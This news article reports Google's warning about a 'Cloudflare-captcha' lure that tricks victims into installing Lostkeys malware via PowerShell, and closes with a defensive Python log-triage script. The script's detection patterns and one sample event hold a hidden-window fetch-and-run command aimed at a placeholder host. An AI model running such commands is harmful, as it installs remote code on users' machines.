
Google Warns of Targeted Attacks Using "Cloudflare-Captcha"


By Netvora Tech News


Google has issued a warning about a new type of targeted attack that uses a technique called "Cloudflare-captcha" to infect victims with malware. The tech giant says the attacks specifically target Western organizations and NGOs. The attackers begin by luring the victim to a specific website. Once the victim arrives there, they are shown a message saying they need to solve a "captcha" before proceeding. In reality, the victim is being tricked into running a malicious PowerShell command on their own system. This command ultimately installs the Lostkeys malware, which steals files from the system and sends system information and running processes to the attacker.

Google says the responsible group often steals login credentials for email accounts, allowing it to steal emails and contacts. Last month, security firm Proofpoint discovered that malicious PowerShell commands are being used by both cybercriminals and state-sponsored actors for cyberespionage. According to Google, a group supported by the Russian state is behind the "Cloudflare-captcha" attacks. It's not clear how the attackers get their victims to visit the website in the first place, but Google is urging users to be cautious and avoid interacting with any suspicious websites or prompts.

How the Attack Works

The attack begins with the attacker luring the victim to a specific website, which is designed to look legitimate. Once the victim arrives on the website, they are presented with a message saying they need to solve a "captcha" in order to proceed. In reality, the "captcha" is just a ruse to get the victim to run a malicious PowerShell command on their own system.

  • The victim is tricked into running the malicious PowerShell command, which installs the Lostkeys malware.
  • The Lostkeys malware steals files from the system and sends system information and running processes to the attacker.
  • The attacker uses the stolen information to gain access to the victim's email account and steal emails and contacts.

What You Can Do to Protect Yourself

If you receive an email or message asking you to solve a "captcha" or perform any other suspicious action, do not interact with it. Instead, immediately report the incident to your IT department or security team. Additionally, make sure to keep your software and operating system up to date, and use strong, unique passwords for all of your accounts.
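
For a security team that receives such a report, the following added example (not from Google's report or the original article) shows one way to triage process-creation logs for PowerShell that a user started by hand with risky arguments. It assumes events carry Sysmon-style fields (Image, ParentImage, CommandLine, Computer) and that a hand-run command appears with explorer.exe as parent; the indicator patterns are general traits of pasted one-liners, not Lostkeys-specific signatures, and all sample events are constructed.

```python
import re

INTERACTIVE_PARENTS = {"explorer.exe"}   # assumption: command was run from the desktop shell
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INDICATORS = {                           # reason -> command-line pattern
    "hidden window": re.compile(r"(?i)\s[-/]w[a-z]*\s+hidden\b"),
    "encoded command": re.compile(r"(?i)\s[-/]e[a-z]*\s+[A-Za-z0-9+/=]{16,}"),
    "remote fetch": re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"),
    "invoke-expression": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (host, reasons) for PowerShell started by hand with risky arguments."""
    hits = []
    for ev in events:
        if basename(ev["Image"]) not in POWERSHELL:
            continue
        # Skip service- or task-launched PowerShell; only interactive launches are in scope.
        if basename(ev["ParentImage"]) not in INTERACTIVE_PARENTS:
            continue
        reasons = [name for name, rx in INDICATORS.items()
                   if rx.search(ev["CommandLine"])]
        if reasons:
            hits.append((ev["Computer"], reasons))
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; hosts, URL and base64 string are placeholders.
SAMPLE_EVENTS = [
    {"Computer": "ws-014", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify)"'},
    {"Computer": "ws-020", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},   # user opened a console, no arguments
    {"Computer": "srv-002", "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -WindowStyle Hidden -File C:\Scripts\inventory.ps1"},
    {"Computer": "ws-031", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc QUJDREVGR0hJSktMTU5PUA=="},
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: review PowerShell launch ({', '.join(reasons)})")
```

The parent-process filter is what keeps the scheduled inventory script on srv-002 out of the results even though it also uses a hidden window.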
